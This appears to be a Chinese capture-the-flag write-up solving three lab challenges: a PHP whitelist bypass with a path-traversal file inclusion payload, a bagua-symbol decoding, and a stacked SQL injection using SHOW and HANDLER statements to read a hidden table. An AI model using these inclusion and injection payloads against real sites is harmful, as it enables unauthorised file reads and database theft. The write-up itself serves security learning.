[HCTF 2018]Warmup

HCTF 2018Warmup

什么也没有就给了一个表情,那我们查看源码看看

发现了有一个source.php文件,打开看看

发现了代码审计,

复制代码
<?php
    // 高亮显示当前文件的内容,通常用于调试和查看源代码
    highlight_file(__FILE__);

    // 定义一个名为 emmm 的类
    class emmm
    {
        // 定义一个静态方法 checkFile,接受一个引用参数 $page
        public static function checkFile(&$page)
        {
            // 定义一个白名单数组,包含两个键值对
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

            // 检查 $page 是否被设置且是否为字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it"; // 如果条件不满足,输出 "you can't see it"
                return false; // 返回 false
            }

            // 检查 $page 是否在白名单中
            if (in_array($page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 使用 mb_substr 从 $page 中提取子字符串,直到遇到问号(?)
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            // 检查这个子字符串是否在白名单中
            if (in_array($_page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 将 $page 进行 URL 解码
            $_page = urldecode($page);
            // 再次使用 mb_substr 提取子字符串,直到遇到问号(?)
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            // 检查这个子字符串是否在白名单中
            if (in_array($_page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 如果上述所有检查都未通过,输出 "you can't see it"
            echo "you can't see it";
            return false; // 返回 false
        }
    }

    // 检查 $_REQUEST['file'] 是否不为空且为字符串,并且调用 emmm::checkFile 方法进行检查
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        // 如果条件满足,包含该文件并退出脚本
        include $_REQUEST['file'];
        exit;
    } else {
        // 如果条件不满足,输出一张图片
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

查看一下hint.php文件

发现了flag再ffffllllaaaagggg中

因为我们当前的source.php一般是在html目录下,往上是www,var,然后到根目录,flag一般就放在根目录下面,这里还有一个hint.php?/或者source.php?/,因此需要返回四层才能到根目录 。

source.php/?file=hint.php?../../../../../ffffllllaaaagggg

得到flag

NSSCTF{3c195233-356a-41f1-9dc0-6342cb73563c}

SWPUCTF 2021 新生赛traditional

给了八卦图的密文,让我们解密

方法:

找到八卦图文对应的二进制编码,先转换成二进制编码再转换ASCII编码就得到flag了

我这里直接用的随波逐流:

NSSCTF{Da01sall}

强网杯 2019随便注

发现1'不行

发现1';可以

发现1';show databases;-- +可以查看数据库名

发现1';show tables;-- +可以查看表名

查看一群数字名的里面有没有flag,1';show columns from `1919810931114514`;

发现了falg这个字段名

1';handler `1919810931114514` open;handler `1919810931114514` read next;

NSSCTF{d9978321-a536-4c2e-916e-9c2be34ca27b}

相关推荐
AFinalStone2 小时前
Android 7系统网络(八)应用API层—ConnectivityManager使用与实战调试
android·网络
接着奏乐接着舞2 小时前
大模型开发 agent 知识库
java
xuhaoyu_cpp_java2 小时前
SpringBoot学习(四)
java·经验分享·spring boot·笔记·学习
plainGeekDev2 小时前
kapt 替换为 KSP
android·java·kotlin
蜡台3 小时前
通过Gradle脚本声明更改Java变量
android·java·开发语言·python·kotlin·gradle·groovy
程序员天天困3 小时前
后端视角看 EventBus:发布订阅总线的原理、场景与用法
java·后端
要开心吖ZSH3 小时前
AI医疗分诊与健康咨询助手agent开发——(4-2)从零到一:我给AI医疗分诊助手加了个“知识库大脑“,终于搞懂了RAG是什么
java·docker·agent·医疗·rag
AI人工智能+电脑小能手4 小时前
【大白话说Java面试题 第179题】【07_Redis篇】第15题:什么是 Redlock 算法?
java·redis·分布式锁·高可用·redlock
怎么比啊都是大神5 小时前
关于==null、isEmpty()和StrUtil.isBlank()
java
唐青枫5 小时前
Java Neo4j 实战指南:从图模型、Cypher 到 Spring Boot 关系查询
java